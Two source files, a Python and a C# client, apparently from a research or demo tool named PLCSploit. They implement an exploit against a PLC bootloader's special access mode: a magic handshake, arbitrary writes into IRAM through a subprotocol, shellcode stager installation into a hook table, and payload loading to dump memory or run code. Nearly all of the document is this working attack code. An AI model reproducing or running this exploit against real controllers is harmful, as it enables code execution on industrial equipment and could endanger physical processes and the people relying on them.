File: src/logic/plc_client.py
#!/usr/bin/env python3
import struct
import time
import subprocess
import binascii

from pwn import remote, context, log, xor

context.update(log_level="info", bits=32, endian="big")

# --- Constants ---
SEND_REQ_SAFETY_SLEEP_AMT = 0.01
STAGER_PL_FILENAME = "payloads/stager/stager.bin"
DUMPMEM_PL_FILENAME = "payloads/dump_mem/build/dump_mem.bin"
FIRST_PAYLOAD_LOCATION = 0x10010100
MAX_MSG_LEN = 192 - 2
DEFAULT_STAGER_ADDHOOK_IND = 0x20
DEFAULT_SECOND_ADD_HOOK_IND = 0x1a
IRAM_STAGER_START = 0x10030100
IRAM_STAGER_END = 0x100303FC
IRAM_STAGER_MAX_SIZE = IRAM_STAGER_END - IRAM_STAGER_START
ANSW_ENTER_SUBPROTO_SUCCESS = b"\x80\x00"
ADD_HOOK_TABLE_START = 0x1003ABA0

SUBPROT_80_MODE_IRAM = 1
SUBPROT_80_IOC_SPI = 2
SUBPROT_80_MODE_FLASH = 3
SUBPROT_80_MODE_NOP = 4
SUBPROT_80_MODE_MAGICS = [None, 0x3BC2, 0x9d26, 0xe17a, 0xc54f]


class PlcClient:
    def __init__(self, host, port, log_callback=print):
        self.host = host
        self.port = port
        self.log_callback = log_callback
        self.r = None
        self.next_payload_location = FIRST_PAYLOAD_LOCATION

    def log(self, message):
        self.log_callback(message)

    def connect(self, switch_power=False, ps_host='powersupply', ps_port=80, ps_delay=10):
        if switch_power:
            self.log(f"Turning off power supply and sleeping for {ps_delay} seconds")
            try:
                subprocess.check_call(
                    ["tools/powersupply/switch_power.py", "--port", str(ps_port), "--host", ps_host, "off"])
                self.log("[+] Turned off power supply, sleeping")
                time.sleep(ps_delay)
                self.log("[+] Turned on power supply again")
                subprocess.check_call(
                    ["tools/powersupply/switch_power.py", "--port", str(ps_port), "--host", ps_host, "on"])
                self.log("[+] Successfully turned on power supply")
            except (subprocess.CalledProcessError, FileNotFoundError) as e:
                self.log(f"[!] Power switch command failed: {e}")
                self.log("[!] Ensure 'tools/powersupply/switch_power.py' is executable and configured.")
                return False

        self.log(f"Attempting to connect to {self.host}:{self.port}...")
        self.r = remote(self.host, self.port)

        magic = b"MFGT1"
        pad = b"A" * 4

        self.log("Sending magic string to enter special access mode...")
        for _ in range(100):
            self.r.send(pad + magic)
            answ = self.r.recv(256, timeout=0.3)
            if answ and b"-CPU" in answ:
                if not answ.startswith(b"\x05-CPU"):
                    answ = self.r.recv(256) + answ

                self.r.unrecv(answ)
                self.log("[+] Got connection")
                greeting = self._recv_packet()
                self.log(f"[+] Got special access greeting: {greeting.decode(errors='ignore')} [{binascii.hexlify(greeting).decode()}]")

                version_info = self.get_version()
                self.log(f"[+] Got PLC bootLoader version: {version_info}")

                return True
        self.log("[-] Failed to get special access greeting.")
        self.disconnect()
        return False

    def disconnect(self, continue_plc=False):
        if self.r:
            self.log("Saying bye...")
            try:
                if not continue_plc:
                    # In the original code, this was behind a raw_input,
                    # suggesting it might be good to pause before continuing the boot.
                    self.log("Pausing before sending bye...")
                    time.sleep(1)
                self._bye()
            except Exception as e:
                self.log(f"Error while saying bye: {e}")
            finally:
                self.r.close()
                self.r = None
                self.log("Connection closed.")

    def _calc_checksum_byte(self, incoming: bytes) -> bytes:
        return struct.pack("<i", -sum(incoming[:incoming[0]]))[0:1]

    def _send_packet(self, msg: bytes, step=2, sleep_amt=0.01):
        assert len(msg) <= MAX_MSG_LEN
        time.sleep(SEND_REQ_SAFETY_SLEEP_AMT)

        msg = bytes([len(msg) + 1]) + msg
        msg += self._calc_checksum_byte(msg)

        self.log(f"sending packet: {binascii.hexlify(msg).decode()}")
        for i in range(0, len(msg), step):
            time.sleep(sleep_amt)
            self.r.send(msg[i:i + step])

    def _recv_packet(self) -> bytes:
        answ = self.r.recv(1)
        if not answ:
            return b''
        rem = answ[0]
        while rem != 0:
            add = self.r.recv(rem)
            rem -= len(add)
            answ += add

        if self._calc_checksum_byte(answ[:-1]) != answ[-1:]:
            self.log(f"Checksum validity failed. Got: {answ} [{binascii.hexlify(answ).decode()}]")
            return None
        else:
            return answ[1:-1]

    def _encode_packet_for_stager(self, chunk: bytes) -> bytes:
        for i in range(1, 256):
            key = bytes([i])
            if key not in chunk and i != len(chunk) + 2:
                encoded = key + xor(chunk, key)
                return encoded
        self.log(f"Could not encode chunk: {binascii.hexlify(chunk).decode()}")
        raise RuntimeError("Failed to encode chunk for stager")

    def _send_full_msg_via_stager(self, msg: bytes, chunk_size=2, sleep_amt=0.01):
        for i in range(0, len(msg), MAX_MSG_LEN - 1):
            time.sleep(SEND_REQ_SAFETY_SLEEP_AMT)
            chunk = msg[i:i + MAX_MSG_LEN - 1]
            self.log(f"Send progress: 0x{i:06x}/0x{len(msg):06x} ({float(i) / float(len(msg)):.2f})")
            self._send_packet(self._encode_packet_for_stager(chunk), chunk_size, sleep_amt)
            answ = self._recv_packet()
            if not len(answ) == 1:
                raise RuntimeError(f"Expecting empty ack package, got '{answ}' instead")
            if answ == b"\xff":
                self.log("[WARNING] Interrupting the sending...")
                return None
        self._send_packet(self._encode_packet_for_stager(b""))
        self._recv_packet()

    def _invoke_primary_handler(self, handler_ind, args=b"", await_response=True):
        payload = bytes([handler_ind]) + args
        self._send_packet(payload)
        if await_response:
            return self._recv_packet()
        return None

    def _enter_subproto_handler(self, mode):
        assert 1 <= mode < len(SUBPROT_80_MODE_MAGICS)
        return self._invoke_primary_handler(0x80, struct.pack(">H", SUBPROT_80_MODE_MAGICS[mode]))

    def _leave_subproto_handler(self):
        self._send_packet(b"\x81\xD0\x67")
        return self._recv_packet()

    def _raw_subproto_write(self, arg_dw, add_args, step=2, sleep_amt=0.01):
        self._send_packet(b"\x84\x5a\x2e" + struct.pack(">I", arg_dw) + add_args, step, sleep_amt)
        return self._recv_packet()

    def _exploit_write_chunk_to_iram(self, tar, contents, already_in_80_handler=False):
        assert len(contents) % 2 == 0
        assert len(contents) + 8 <= MAX_MSG_LEN
        assert 0x10000000 <= tar
        assert tar + len(contents) <= 0x10800000

        if not already_in_80_handler:
            self._enter_subproto_handler(SUBPROT_80_MODE_IRAM)

        target_argument = tar - 0x10000000

        self._raw_subproto_write(target_argument, len(contents) * b"\xff")

        if len(contents) == 4 and (contents[:2] in [b"\x00\x00", b"\x0a\x00"] or contents[2:4] in [b"\x00\x00", b"\x0a\x00"]):
            self._raw_subproto_write(target_argument, contents[:2])
            self._raw_subproto_write(target_argument + 2, contents[2:4])
        else:
            self._raw_subproto_write(target_argument, contents)

        if not already_in_80_handler:
            self._leave_subproto_handler()

    def _exploit_write_to_iram(self, tar, contents):
        assert len(contents) % 2 == 0
        assert 0x10000000 <= tar and tar + len(contents) <= 0x10800000

        answ = self._enter_subproto_handler(SUBPROT_80_MODE_IRAM)
        if answ != ANSW_ENTER_SUBPROTO_SUCCESS:
            raise RuntimeError(f"Failed to enter IRAM subprotocol. Got: {answ}")

        if len(contents) % 4 == 2:
            self._exploit_write_chunk_to_iram(tar, contents[:2], True)
            tar += 2
            contents = contents[2:]

        chunk_size = 16
        for i in range(0, len(contents), chunk_size):
            self.log(f"Writing {i:04x}/{len(contents):04x}")
            chunk = contents[i:i + chunk_size]
            self._exploit_write_chunk_to_iram(tar + i, chunk, True)

        self._leave_subproto_handler()

    def get_version(self):
        answ = self._invoke_primary_handler(0)
        return answ[2:3].decode() + ".".join([str(c) for c in answ[3:-2]])

    def _bye(self):
        answ = self._invoke_primary_handler(0xa2)
        if answ != b"\xa2\x00":
            self.log(f"Warning: Unexpected response to bye command: {answ}")

    def _invoke_add_hook(self, add_hook_no, args=b"", await_response=True):
        assert 0 <= add_hook_no <= 0x20
        hook_ind = 0x1c
        args = bytes([add_hook_no]) + args
        return self._invoke_primary_handler(hook_ind, args, await_response)

    def _install_add_hook(self, tar_addr, shellcode, add_hook_no):
        assert 0 <= add_hook_no <= 0x20
        if len(shellcode) % 2 != 0:
            shellcode += b"\xff"
        self._exploit_write_to_iram(tar_addr, shellcode)
        self._exploit_write_to_iram(ADD_HOOK_TABLE_START + 8 * add_hook_no + 2, b"\x00\xff" + struct.pack(">I", tar_addr))

    def install_stager(self, shellcode, tar_addr=IRAM_STAGER_START, add_hook_no=DEFAULT_STAGER_ADDHOOK_IND):
        assert 0 < len(shellcode) <= IRAM_STAGER_MAX_SIZE
        start_time = time.time()
        self.log("Installing the initial stager payload...")
        self._install_add_hook(tar_addr, shellcode, add_hook_no)
        self.log(f"Writing the initial stage took {time.time() - start_time:.2f} seconds")
        return add_hook_no

    def _write_via_stager(self, tar_addr, contents, stager_add_hook_ind=DEFAULT_STAGER_ADDHOOK_IND):
        self._invoke_add_hook(stager_add_hook_ind, struct.pack(">I", tar_addr), False)
        self._send_full_msg_via_stager(contents, 8, 0.01)

    def install_payload_via_stager(self, payload, stager_addhook_ind):
        start_time = time.time()
        self.log("Installing additional hook via stager...")

        add_hook_no = DEFAULT_SECOND_ADD_HOOK_IND
        tar_addr = self.next_payload_location

        # Set up function pointer
        self._write_via_stager(ADD_HOOK_TABLE_START + 8 * add_hook_no, b"\x00\x00\x00\xff" + struct.pack(">I", tar_addr), stager_addhook_ind)
        # Write payload code
        self._write_via_stager(tar_addr, payload, stager_addhook_ind)

        self.next_payload_location += len(payload)
        if self.next_payload_location % 4 != 0:
            self.next_payload_location += 4 - (self.next_payload_location % 4)

        self.log(f"Installing the additional hook took {time.time() - start_time:.2f} seconds")
        return add_hook_no

    def dump_memory(self, address, length, dump_payload):
        with open(STAGER_PL_FILENAME, "rb") as f:
            stager_code = f.read()
        stager_hook = self.install_stager(stager_code)

        dump_hook = self.install_payload_via_stager(dump_payload, stager_hook)

        self.log(f"Dumping {length} bytes of memory from 0x{address:08x}")
        answ = self._invoke_add_hook(dump_hook, b"A" + struct.pack(">II", address, length))

        if not answ or not answ.startswith(b"Ok"):
            raise RuntimeError(f"Failed to start memory dump. Response: {answ}")

        contents = b""
        stop = False
        while not stop:
            next_chunk = self._recv_packet()
            if next_chunk == b"":
                stop = True
            else:
                contents += next_chunk
                self.log(f"Read {len(contents)} bytes...")

        self.log(f"Successfully dumped {len(contents)} bytes.")
        return contents

    def run_test_payload(self, payload):
        with open(STAGER_PL_FILENAME, "rb") as f:
            stager_code = f.read()
        stager_hook = self.install_stager(stager_code)

        test_hook = self.install_payload_via_stager(payload, stager_hook)

        self.log("Invoking test payload...")
        answ = self._invoke_add_hook(test_hook)
        self.log(f"Got answer: {answ.decode(errors='ignore')}")
        return answ

    def run_tictactoe(self, payload, input_callback, output_callback):
        with open(STAGER_PL_FILENAME, "rb") as f:
            stager_code = f.read()
        stager_hook = self.install_stager(stager_code)

        game_hook = self.install_payload_via_stager(payload, stager_hook)

        self.log("[*] Starting Tic-Tac-Toe...")
        self._invoke_add_hook(game_hook, await_response=False)

        msg_buffer = ""
        END_TOKEN = "==>"
        while END_TOKEN not in msg_buffer:
            msg_bytes = self._recv_packet()
            if not msg_bytes:
                break
            msg = msg_bytes.decode(errors='ignore')
            output_callback(msg)
            msg_buffer += msg

            if "enter a number" in msg:
                choice = input_callback() # Ask GUI for input
                self._send_packet(choice.encode())

        self.log("[*] Game over!")

File: reference_code/csharp-application/PLCSploit.Core/PLCClient.cs
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Net.Sockets;
using System.Text;
using System.Threading;

namespace PLCSploit.Core
{
    public class PLCClient : IDisposable
    {
        private TcpClient _client;
        private NetworkStream _stream;
        private readonly Action<string, LogCategory> _logger;

        private const int MAX_MSG_LEN = 190;
        private const uint ADD_HOOK_TABLE_START = 0x1003ABA0;
        private const int DEFAULT_STAGER_ADDHOOK_IND = 0x20;
        private const int DEFAULT_SECOND_ADD_HOOK_IND = 0x1a;
        private const uint IRAM_STAGER_START = 0x10030100;
        public uint next_payload_location = 0x10010100;

        public bool IsConnected => _client?.Connected ?? false;

        public PLCClient(Action<string, LogCategory> logger = null)
        {
            // Default logger delegates to Log.Add (info category if not provided)
            _logger = logger ?? ((msg, cat) => Log.Add(msg, cat));
        }

        private static string BytesToEscapedAscii(byte[] data)
        {
            var sb = new StringBuilder(data.Length * 2);
            foreach (var b in data)
            {
                if (b >= 0x20 && b <= 0x7E)
                {
                    sb.Append((char)b);
                }
                else
                {
                    sb.Append("\\x").Append(b.ToString("X2"));
                }
            }
            return sb.ToString();
        }

        private static bool ContainsPattern(byte[] haystack, byte[] needle)
        {
            if (needle == null || haystack == null || needle.Length == 0 || haystack.Length < needle.Length)
                return false;
            for (int i = 0; i <= haystack.Length - needle.Length; i++)
            {
                bool match = true;
                for (int j = 0; j < needle.Length; j++)
                {
                    if (haystack[i + j] != needle[j]) { match = false; break; }
                }
                if (match) return true;
            }
            return false;
        }

        public void Connect(string host, int port)
        {
            if (IsConnected) return;
            _logger($"Connecting to PLC at {host}:{port}...", LogCategory.Communication);
            _client = new TcpClient(host, port);
            _stream = _client.GetStream();
            _client.ReceiveTimeout = 500;
            _logger("PLC client connected.", LogCategory.Communication);
        }

        public bool Handshake()
        {
            if (!IsConnected) throw new InvalidOperationException("Client is not connected.");

            _logger("Attempting handshake...", LogCategory.Communication);
            string magic = "MFGT1";
            string pad = "AAAA";
            byte[] handshake = Encoding.ASCII.GetBytes(pad + magic);

            for (int i = 0; i < 100; i++)
            {
                Send(handshake);

                var responseBuffer = new List<byte>();
                var startTime = DateTime.Now;
                var totalTimeout = TimeSpan.FromMilliseconds(300);

                while ((DateTime.Now - startTime) < totalTimeout)
                {
                    var answ = Receive(timeout: 50);
                    if (answ.Length > 0)
                    {
                        responseBuffer.AddRange(answ);
                        if (responseBuffer.Count >= 4)
                        {
                            var respBytes = responseBuffer.ToArray();
                            var printable = BytesToEscapedAscii(respBytes);
                            _logger($"Received handshake response: {BitConverter.ToString(respBytes).Replace("-", "")} (ASCII: {printable})", LogCategory.Info);

                            if (ContainsPattern(respBytes, new byte[] { (byte)'-', (byte)'C', (byte)'P', (byte)'U' }))
                            {
                                _logger($"SUCCESS: Got special access greeting: ASCII: {printable}", LogCategory.Info);
                                return true;
                            }
                        }
                    }
                    else
                    {
                        if (responseBuffer.Count > 0)
                        {
                            var respBytes = responseBuffer.ToArray();
                            var printable = BytesToEscapedAscii(respBytes);
                            _logger($"Final handshake response: {BitConverter.ToString(respBytes).Replace("-", "")} (ASCII: {printable})", LogCategory.Info);

                            if (ContainsPattern(respBytes, new byte[] { (byte)'-', (byte)'C', (byte)'P', (byte)'U' }))
                            {
                                _logger($"SUCCESS: Got special access greeting: ASCII: {printable}", LogCategory.Info);
                                return true;
                            }
                        }
                        break; 
                    }
                }
                Thread.Sleep(10);
            }
            _logger("ERROR: Handshake failed.", LogCategory.Error);
            return false;
        }

        public void Send(byte[] data)
        {
            if (!IsConnected) return;
            _stream.Write(data, 0, data.Length);
        }

        public byte[] Receive(int size = 256, int timeout = 300)
        {
            if (!IsConnected) return new byte[0];
            _client.ReceiveTimeout = timeout;
            var buffer = new byte[size];
            try
            {
                var bytesRead = _stream.Read(buffer, 0, buffer.Length);
                var data = new byte[bytesRead];
                Array.Copy(buffer, data, bytesRead);
                return data;
            }
            catch (IOException)
            {
                return new byte[0];
            }
        }

        public byte CalculateChecksum(IEnumerable<byte> data)
        {
            int sum = 0;
            foreach (var b in data)
            {
                sum += b;
            }
            var negativeSum = -sum;
            var bytes = BitConverter.GetBytes(negativeSum);
            if (!BitConverter.IsLittleEndian)
            {
                Array.Reverse(bytes);
            }
            return bytes[0];
        }

        public void SendPacket(byte[] msg, int step = 2, int sleepAmt = 10)
        {
            if (msg.Length > MAX_MSG_LEN)
                throw new ArgumentException("Message too long");
            Thread.Sleep(10);
            var packet = new byte[msg.Length + 2];
            packet[0] = (byte)(msg.Length + 1);
            Array.Copy(msg, 0, packet, 1, msg.Length);
            packet[packet.Length - 1] = CalculateChecksum(packet.Take(packet.Length - 1));
            _logger($"Sending packet: {BitConverter.ToString(packet).Replace("-", "")}", LogCategory.Info);
            for (int i = 0; i < packet.Length; i += step)
            {
                Thread.Sleep(sleepAmt);
                var chunk = packet.Skip(i).Take(step).ToArray();
                Send(chunk);
            }
        }

        public byte[] RecvPacket()
        {
            var lenByte = Receive(1);
            if (lenByte == null || lenByte.Length == 0) return null;

            var len = lenByte[0];
            _logger($"RecvPacket: Expected packet length (excluding checksum): {len} bytes", LogCategory.Info);
            if (len == 0) return new byte[0];
            var remaining = (int)len;
            var answ = new byte[len + 1];
            answ[0] = lenByte[0];
            var offset = 1;
            while (remaining > 0)
            {
                var add = Receive(remaining, 100);
                if (add == null || add.Length == 0) 
                {
                    _logger($"RecvPacket: Timeout waiting for {remaining} more bytes. Got so far: {BitConverter.ToString(answ.Take(offset).ToArray()).Replace("-", "")}", LogCategory.Info);
                    return null;
                }
                _logger($"RecvPacket: Received {add.Length} bytes: {BitConverter.ToString(add).Replace("-", "")}", LogCategory.Info);
                Array.Copy(add, 0, answ, offset, add.Length);
                offset += add.Length;
                remaining -= add.Length;
                _logger($"RecvPacket: Still need {remaining} more bytes", LogCategory.Info);
            }
            _logger($"RecvPacket: Complete packet (including checksum) received: {BitConverter.ToString(answ).Replace("-", "")} (ASCII: {BytesToEscapedAscii(answ)})", LogCategory.Info);
            var receivedChecksum = answ.Last();
            var lengthByte = answ[0];
            var bytesToChecksum = answ.Take(lengthByte).ToArray();
            var calculatedChecksum = CalculateChecksum(bytesToChecksum);
            _logger($"RecvPacket: Received checksum: {receivedChecksum:X2}, Calculated checksum: {calculatedChecksum:X2}", LogCategory.Info);
            _logger($"RecvPacket: Checksum calculated on {lengthByte} bytes: {BitConverter.ToString(bytesToChecksum).Replace("-", "")}", LogCategory.Info);
            if (calculatedChecksum != receivedChecksum)
            {
                _logger($"ERROR: Checksum validity failed. Got: {BitConverter.ToString(answ).Replace("-", "")}", LogCategory.Info);
                _logger($"RecvPacket: Packet breakdown - Length: {answ[0]:X2}, Data+Len: {BitConverter.ToString(bytesToChecksum).Replace("-", "")}, Checksum: {receivedChecksum:X2}", LogCategory.Info);
                return null;
            }
            var payload = answ.Skip(1).Take(lengthByte - 1).ToArray();
            _logger($"RecvPacket: Extracted payload: {BitConverter.ToString(payload).Replace("-", "")}", LogCategory.Info);
            return payload;
        }

        public byte[] RecvMany()
        {
            var answ = new List<byte>();
            while (true)
            {
                var next_chunk = RecvPacket();
                if (next_chunk == null || next_chunk.Length == 0) break;
                answ.AddRange(next_chunk);
            }
            return answ.ToArray();
        }

        public byte[] GetVersionRaw()
        {
            SendPacket(new byte[] { 0 });
            var answ = RecvPacket();
            if (answ == null)
            {
                _logger("ERROR: Failed to receive version response", LogCategory.Info);
                return null;
            }
            var hex = BitConverter.ToString(answ).Replace("-", "");
            var asciiEsc = BytesToEscapedAscii(answ);
            _logger($"Got PLC bootLoader version: HEX={hex} ASCII={asciiEsc}", LogCategory.Info);
            return answ;
        }

        public string GetVersion()
        {
            var bytes = GetVersionRaw();
            if (bytes == null) return null;
            if (bytes.Length < 5)
            {
                return Encoding.ASCII.GetString(bytes);
            }
            char prefix = (char)bytes[2];
            int count = bytes.Length - 5;
            if (count < 0) count = 0;
            var numbers = bytes.Skip(3).Take(count).Select(b => b.ToString());
            var version = prefix + string.Join(".", numbers);
            _logger($"Got PLC bootLoader version (formatted): {version}", LogCategory.Info);
            return version;
        }

        public byte[] InvokePrimaryHandler(byte handlerInd, byte[] args, bool awaitResponse = true)
        {
            var payload = new byte[1 + args.Length];
            payload[0] = handlerInd;
            Array.Copy(args, 0, payload, 1, args.Length);
            SendPacket(payload);
            if (awaitResponse) return RecvPacket();
            return null;
        }

        public byte[] InvokeAddHook(int addHookNo, byte[] args, bool awaitResponse = true)
        {
            var hookInd = 0x1c;
            var newArgs = new byte[1 + args.Length];
            newArgs[0] = (byte)addHookNo;
            Array.Copy(args, 0, newArgs, 1, args.Length);
            return InvokePrimaryHandler((byte)hookInd, newArgs, awaitResponse);
        }

        public byte[] EnterSubprotocolHandler(int mode)
        {
            ushort[] magics = { 0, 0x3BC2, 0x9d26, 0xe17a, 0xc54f };
            var magic = BitConverter.GetBytes(magics[mode]);
            Array.Reverse(magic);
            return InvokePrimaryHandler(0x80, magic);
        }

        public void LeaveSubprotocolHandler()
        {
            SendPacket(new byte[] { 0x81, 0xD0, 0x67 });
            RecvPacket();
        }

        private void RawSubprotocolWrite(uint arg_dw, byte[] add_args)
        {
            var packet = new byte[7 + add_args.Length];
            packet[0] = 0x84;
            packet[1] = 0x5a;
            packet[2] = 0x2e;
            var arg_dw_bytes = BitConverter.GetBytes(arg_dw);
            Array.Reverse(arg_dw_bytes);
            Array.Copy(arg_dw_bytes, 0, packet, 3, 4);
            Array.Copy(add_args, 0, packet, 7, add_args.Length);
            SendPacket(packet);
            RecvPacket();
        }

        private void ExploitWriteChunkToIRAM(uint tar, byte[] contents)
        {
            var target_argument = tar - 0x10000000;
            var mask = new byte[contents.Length];
            for (int i = 0; i < mask.Length; i++) mask[i] = 0xff;
            RawSubprotocolWrite(target_argument, mask);
            RawSubprotocolWrite(target_argument, contents);
        }

        public void ExploitWriteToIRAM(uint tar, byte[] contents)
        {
            EnterSubprotocolHandler(1);
            int chunk_size = 16;
            for (int i = 0; i < contents.Length; i += chunk_size)
            {
                _logger($"Writing to IRAM {i:X4}/{contents.Length:X4}", LogCategory.Info);
                var chunk = contents.Skip(i).Take(chunk_size).ToArray();
                ExploitWriteChunkToIRAM(tar + (uint)i, chunk);
            }
            LeaveSubprotocolHandler();
        }

        public void InstallStager(byte[] shellcode)
        {
            _logger("Installing stager...", LogCategory.Info);
            ExploitWriteToIRAM(IRAM_STAGER_START, shellcode);
            var ptr = BitConverter.GetBytes(IRAM_STAGER_START);
            Array.Reverse(ptr);
            var data = new byte[] { 0x00, 0xff }.Concat(ptr).ToArray();
            ExploitWriteToIRAM(ADD_HOOK_TABLE_START + 8 * DEFAULT_STAGER_ADDHOOK_IND + 2, data);
            _logger("Stager installed.", LogCategory.Info);
        }

        private byte[] EncodePacketForStager(byte[] chunk)
        {
            for (int i = 1; i < 256; i++)
            {
                bool collision = chunk.Contains((byte)i);
                if (i == chunk.Length + 2) collision = true;
                if (collision) continue;
                var encoded = new byte[chunk.Length + 1];
                encoded[0] = (byte)i;
                for (int j = 0; j < chunk.Length; j++)
                    encoded[j + 1] = (byte)(chunk[j] ^ i);
                return encoded;
            }
            return null;
        }

        public void SendFullMsgViaStager(byte[] msg)
        {
            for (int i = 0; i < msg.Length; i += MAX_MSG_LEN - 1)
            {
                var chunk = msg.Skip(i).Take(MAX_MSG_LEN - 1).ToArray();
                SendPacket(EncodePacketForStager(chunk));
                RecvPacket();
            }
            SendPacket(EncodePacketForStager(new byte[0]));
            RecvPacket();
        }

        public void WriteViaStager(uint tar_addr, byte[] contents)
        {
            var addr_bytes = BitConverter.GetBytes(tar_addr);
            Array.Reverse(addr_bytes);
            InvokeAddHook(DEFAULT_STAGER_ADDHOOK_IND, addr_bytes, false);
            SendFullMsgViaStager(contents);
        }

        public int InstallAddHookViaStager(uint tar_addr, byte[] shellcode)
        {
            _logger($"Installing payload at 0x{tar_addr:X8} via stager...", LogCategory.Info);
            var ptr = BitConverter.GetBytes(tar_addr);
            Array.Reverse(ptr);
            var data = new byte[] { 0x00, 0x00, 0x00, 0xff }.Concat(ptr).ToArray();
            WriteViaStager(ADD_HOOK_TABLE_START + 8 * DEFAULT_SECOND_ADD_HOOK_IND, data);
            WriteViaStager(tar_addr, shellcode);

            if (tar_addr == next_payload_location)
            {
                next_payload_location += (uint)shellcode.Length;
                while (next_payload_location % 4 != 0)
                {
                    next_payload_location++;
                }
            }
            _logger("Payload installed.", LogCategory.Info);
            return DEFAULT_SECOND_ADD_HOOK_IND;
        }

        public byte[] PayloadDumpMem(uint tar_addr, uint num_bytes, int addhook_ind)
        {
            var addr_bytes = BitConverter.GetBytes(tar_addr);
            Array.Reverse(addr_bytes);
            var num_bytes_arr = BitConverter.GetBytes(num_bytes);
            Array.Reverse(num_bytes_arr);

            var args = new List<byte>();
            args.Add((byte)'A');
            args.AddRange(addr_bytes);
            args.AddRange(num_bytes_arr);
            var answ = InvokeAddHook(addhook_ind, args.ToArray());
            if (Encoding.ASCII.GetString(answ) != "Ok")
            {
                throw new Exception("Dump command failed");
            }
            return RecvMany();
        }

        public void Bye()
        {
            _logger("Sending bye command to PLC...", LogCategory.Info);
            var response = InvokePrimaryHandler(0xa2, new byte[0]);
            if (response != null && response.Length == 2 && response[0] == 0xa2 && response[1] == 0x00)
            {
                _logger("Bye command successful - PLC will resume normal operation", LogCategory.Info);
            }
            else
            {
                _logger("WARNING: Bye command response was unexpected", LogCategory.Info);
            }
        }

        public void Disconnect()
        {
            _logger("Disconnecting from PLC...", LogCategory.Info);
            _stream?.Close();
            _client?.Close();
            _logger("PLC client disconnected.", LogCategory.Info);
        }

        public void Dispose()
        {
            Disconnect();
        }
    }
}